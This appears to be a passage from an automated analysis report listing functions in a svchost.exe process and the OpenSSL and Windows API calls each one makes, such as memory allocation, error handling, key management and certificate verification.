Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FC2C0 CRYPTO_free, 28_2_00007FF8A92FC2C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E0130 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A92E0130
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4120 CRYPTO_set_ex_data, 28_2_00007FF8A92F4120
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9328160 CRYPTO_memdup, 28_2_00007FF8A9328160
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 28_2_00007FF8A92F4160
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9318120 CRYPTO_free, 28_2_00007FF8A9318120
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F8140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92F8140
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9320130 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A9320130
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932A1D0 CRYPTO_realloc, 28_2_00007FF8A932A1D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E6190 CRYPTO_malloc,CRYPTO_free, 28_2_00007FF8A92E6190
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93121E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl, 28_2_00007FF8A93121E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E81E0 CRYPTO_get_ex_data, 28_2_00007FF8A92E81E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug, 28_2_00007FF8A933C190
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9356190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free, 28_2_00007FF8A9356190
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93241B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert, 28_2_00007FF8A93241B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A935844C
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9354460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free, 28_2_00007FF8A9354460
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9312470 CRYPTO_zalloc, 28_2_00007FF8A9312470
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9308400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf, 28_2_00007FF8A9308400
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D2460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free, 28_2_00007FF8A92D2460
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9358414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free, 28_2_00007FF8A9358414
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F0450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 28_2_00007FF8A92F0450
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9358426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free, 28_2_00007FF8A9358426
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock, 28_2_00007FF8A92F4490
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E24D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free, 28_2_00007FF8A92E24D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EA330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92EA330
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9304330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 28_2_00007FF8A9304330
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9340340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug, 28_2_00007FF8A9340340
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free, 28_2_00007FF8A930A330
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 28_2_00007FF8A92F4380
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93123F0 CRYPTO_free, 28_2_00007FF8A93123F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D23C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92D23C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92EC610
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A931E660
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4660 CRYPTO_free,CRYPTO_malloc,memcpy, 28_2_00007FF8A92F4660
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9322630 OPENSSL_cleanse,CRYPTO_free, 28_2_00007FF8A9322630
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9342630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9342630
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932E6D0 CRYPTO_malloc, 28_2_00007FF8A932E6D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9352500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy, 28_2_00007FF8A9352500
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free, 28_2_00007FF8A930E510
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free, 28_2_00007FF8A931A5C0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E25A0 CRYPTO_strdup,CRYPTO_free, 28_2_00007FF8A92E25A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93045A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A93045A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F8580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92F8580
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935C5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A935C5A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93225B0 OPENSSL_cleanse,CRYPTO_free, 28_2_00007FF8A93225B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932A850 CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A932A850
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9328850 CRYPTO_realloc, 28_2_00007FF8A9328850
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D8812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new, 28_2_00007FF8A92D8812
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9324800 OPENSSL_LH_delete,CRYPTO_free, 28_2_00007FF8A9324800
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D2860 CRYPTO_zalloc,InitializeCriticalSection, 28_2_00007FF8A92D2860
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931E810 CRYPTO_zalloc, 28_2_00007FF8A931E810
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock, 28_2_00007FF8A92F4840
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FA8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free, 28_2_00007FF8A92FA8B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DE880 CRYPTO_THREAD_run_once, 28_2_00007FF8A92DE880
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9342880 CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9342880
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935C890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free, 28_2_00007FF8A935C890
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93168B0 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A93168B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935A8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A935A8B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9322740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free, 28_2_00007FF8A9322740
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D8720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A92D8720
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DE700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92DE700
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9320770 CRYPTO_clear_free,CRYPTO_free, 28_2_00007FF8A9320770
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931C700 CRYPTO_malloc,memcmp,memcpy,memcpy, 28_2_00007FF8A931C700
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932E730 CRYPTO_free, 28_2_00007FF8A932E730
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93267D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts, 28_2_00007FF8A93267D1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93207D0 CRYPTO_malloc,memcpy,CRYPTO_free, 28_2_00007FF8A93207D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 28_2_00007FF8A931A7D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free, 28_2_00007FF8A934C7E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D27F0 DeleteCriticalSection,CRYPTO_free, 28_2_00007FF8A92D27F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932E790 CRYPTO_free, 28_2_00007FF8A932E790
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93327B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A93327B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932DA40 CRYPTO_memcmp, 28_2_00007FF8A932DA40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug, 28_2_00007FF8A92D9A20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9311A60 CRYPTO_free, 28_2_00007FF8A9311A60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E3A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92E3A70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3A70 CRYPTO_get_ex_data, 28_2_00007FF8A92F3A70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DDA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free, 28_2_00007FF8A92DDA50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free, 28_2_00007FF8A934BAA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E1950 CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A92E1950
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9337920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9337920
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free, 28_2_00007FF8A9349985
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free, 28_2_00007FF8A934999C
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93079D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93079D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93119A0 CRYPTO_malloc, 28_2_00007FF8A93119A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93499B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A93499B3
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9359C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9359C40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EBC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A92EBC10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9341C70 CRYPTO_realloc, 28_2_00007FF8A9341C70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1C50 CRYPTO_zalloc, 28_2_00007FF8A92D1C50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free, 28_2_00007FF8A92D9C50
